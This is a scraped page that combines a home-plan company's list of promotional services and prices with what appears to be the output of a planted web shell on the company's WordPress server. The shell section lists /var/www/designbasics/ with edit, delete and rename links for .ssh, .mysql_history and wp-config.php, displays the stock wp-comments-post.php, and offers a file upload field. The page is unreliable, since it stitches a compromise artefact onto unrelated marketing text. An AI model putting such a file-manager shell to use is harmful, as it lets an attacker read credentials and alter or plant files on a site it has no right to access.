Services We Offer

build-footer

Customized Promotional Handout

$85.00

Perfect for use as a tear sheet in your sales packet or as a handout in your model home, sales office, home shows, or special events. The customized promotional handout is for trade professionals that wish to legally advertise or showcase this design before (or after) purchasing the construction drawings and building the home.
This handout is provided electronically. Digital artwork* is hi-resolution, suitable for printing, and can be downsized for use on your website by your website administrator. Printed actual size is 8.5” x 11”. With this purchase, you will also receive the individual digital images for use on your web site, print media, and MLS.

*If you join our Builder-Centric℠ Preferred Builder Program, you will receive your floor plan artwork in color (sample at right) at no extra charge!

build-footer

Customized Home Renderings

Contact for price

Design Basics wants to help you build the home of your dreams. That’s why we offer custom 3D elevation renderings to help our customers visualize how a home will look once it’s built. Our team will work closely alongside you to help you choose the features of your rendering and create an image for you to see your home’s style and curb appeal!

build-footer

Plan Promotional License

$25

Copyright Protection for Advertising Purposes

Prior to purchasing a home plan license, you may want to advertise that design on your website, in your MLS, or in any print or electronic media. However, due to copyright law you cannot legally use any image, from any source, of a home design offered by Designs Basics without a Promotional
License.
You will receive via email the Promotional License and digital artwork* for the front elevation and each level of the home plan. The digital artwork is hi-resolution, suitable for printing, and can be downsized for use on your website by your website administrator.
To learn more about Plan Promotional Licenses and copyright protections, click here.

build-footer

Project Yard Signs

  • 44″W x 34″H or 34″W x 44″H Pricing and Format Options:
    • Digital File, ordered with the plan license = $250.00
    • Digital File, ordered separately/without the plan license (includes Promotional License) = $300.00
  • Typical production time is 8-10 business days.
build-footer

Promotional Bundle Packages

  • Yard Sign & Color Promo Artwork Bundle purchased with the plan license = $270.00 ($65.00 savings)
  • Yard Sign & Color Promo Artwork Bundle purchased separately/not with the plan license = $345.00 ($40.00 savings)

Typical production time is 8-10 business days.
Contact us to place your Promotional Marketing Materials order: 800.947.7526

Contact us for more information: 1.800.947.7526 or info@designbasics.com.

Current Dir: /var/www/designbasics/

[DIR]  .cache [ delete | rename ]
[DIR]  .local [ delete | rename ]
[FILE] .mysql_history [ edit | delete | rename ]
[DIR]  .ssh [ delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Viewing: /var/www/designbasics/wp-comments-post.php

<?php
/**
 * Handles Comment Post to WordPress and prevents duplicate comment posting.
 *
 * @package WordPress
 */

if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
	$protocol = $_SERVER['SERVER_PROTOCOL'];
	if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) {
		$protocol = 'HTTP/1.0';
	}

	header( 'Allow: POST' );
	header( "$protocol 405 Method Not Allowed" );
	header( 'Content-Type: text/plain' );
	exit;
}

/** Sets up the WordPress Environment. */
require __DIR__ . '/wp-load.php';

nocache_headers();

$comment = wp_handle_comment_submission( wp_unslash( $_POST ) );
if ( is_wp_error( $comment ) ) {
	$data = (int) $comment->get_error_data();
	if ( ! empty( $data ) ) {
		wp_die(
			'<p>' . $comment->get_error_message() . '</p>',
			__( 'Comment Submission Failure' ),
			array(
				'response'  => $data,
				'back_link' => true,
			)
		);
	} else {
		exit;
	}
}

$user            = wp_get_current_user();
$cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) );

/**
 * Fires after comment cookies are set.
 *
 * @since 3.4.0
 * @since 4.9.6 The `$cookies_consent` parameter was added.
 *
 * @param WP_Comment $comment         Comment object.
 * @param WP_User    $user            Comment author's user object. The user may not exist.
 * @param bool       $cookies_consent Comment author's consent to store cookies.
 */
do_action( 'set_comment_cookies', $comment, $user, $cookies_consent );

$location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID;

// If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message.
if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) {
	$location = add_query_arg(
		array(
			'unapproved'      => $comment->comment_ID,
			'moderation-hash' => wp_hash( $comment->comment_date_gmt ),
		),
		$location
	);
}

/**
 * Filters the location URI to send the commenter after posting.
 *
 * @since 2.0.5
 *
 * @param string     $location The 'redirect_to' URI sent via $_POST.
 * @param WP_Comment $comment  Comment object.
 */
$location = apply_filters( 'comment_post_redirect', $location, $comment );

wp_safe_redirect( $location );
exit;

Upload File: